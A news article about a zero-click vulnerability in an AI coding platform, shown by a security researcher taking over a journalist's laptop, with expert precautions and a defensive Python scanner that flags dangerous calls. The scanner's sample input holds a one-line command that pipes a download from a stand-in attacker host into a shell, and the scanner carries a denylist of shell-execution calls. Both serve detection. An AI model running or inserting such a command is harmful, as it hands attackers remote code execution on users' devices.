Hacker Seizes Laptop Using AI App Without a Single Click, Raising Zero-Click Security Concerns

Today, 07:43. Posted by: taiba
A serious security vulnerability has been discovered in "Orchids," a fast-growing AI-powered "vibe-coding" platform that lets users build applications by typing instructions into a chatbot. The flaw was demonstrated when a hacker exploited it to gain instant control of a BBC journalist's laptop. The attack took seconds and required no downloads, clicks, or warnings, exposing a significant zero-click threat in AI coding environments.

Cybersecurity researcher Etizaz Mohsin demonstrated the vulnerability by inserting a small modification into the AI-generated code of a test project running on a spare device. The platform accepted the change automatically, and within moments the laptop was visibly compromised: a file appeared on the desktop, the wallpaper changed to a skull-and-robot design, and a message reading "You are hacked" was displayed.

The exploit bypassed traditional attack vectors such as malicious links and file downloads, giving the attacker full remote access. This could allow an intruder to view files, install monitoring software, or even activate cameras and microphones. Mohsin emphasized that the convenience of AI tools executing commands autonomously carries inherent risks.

Orchids, founded in 2025 and boasting roughly one million users, acknowledged that warnings may have been missed because of its small, overextended development team. Experts, including Ulster University Professor Kevin Curran, warn that AI-generated projects often lack rigorous testing, so vulnerabilities can propagate across multiple builds. Because agentic AI tools execute complex instructions directly on user devices, even minor coding defects can lead to full system compromise.

Security professionals recommend practical precautions for users of AI coding platforms.
Experimental tools should be run on isolated devices, AI accounts should be limited or disposable, and all permissions should be carefully reviewed before granting an AI full access. As AI-powered development becomes more common, ensuring strict security controls and thorough oversight is essential to prevent zero-click exploits from affecting wider audiences.
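To illustrate the kind of safeguard experts describe, the sketch below shows one way a reviewer, or a platform, might statically scan AI-generated Python for calls that would hand an agent shell access before anything is executed. This is a minimal illustration, not Orchids' actual mechanism; the function names and the list of flagged calls are the author's assumptions.

```python
import ast

# Illustrative denylist of calls that give generated code shell or
# arbitrary-execution capability. A real review would go much further.
DANGEROUS_CALLS = {"os.system", "subprocess.run", "subprocess.Popen",
                   "eval", "exec"}

def _dotted_name(func) -> str:
    """Rebuild a dotted call name like 'os.system' from an AST node."""
    if isinstance(func, ast.Name):
        return func.id
    if isinstance(func, ast.Attribute):
        parent = _dotted_name(func.value)
        return f"{parent}.{func.attr}" if parent else func.attr
    return ""

def flag_dangerous_calls(source: str) -> list[str]:
    """Return the risky call names found in a piece of generated code."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call):
            name = _dotted_name(node.func)
            if name in DANGEROUS_CALLS:
                findings.append(name)
    return findings

# A seemingly small edit to generated code can smuggle in a shell command:
generated = "import os\nos.system('curl http://attacker.example | sh')"
print(flag_dangerous_calls(generated))  # -> ['os.system']
```

A static check like this would catch only the crudest payloads, which is why the experts quoted above still recommend isolated devices and restricted permissions as the primary defense.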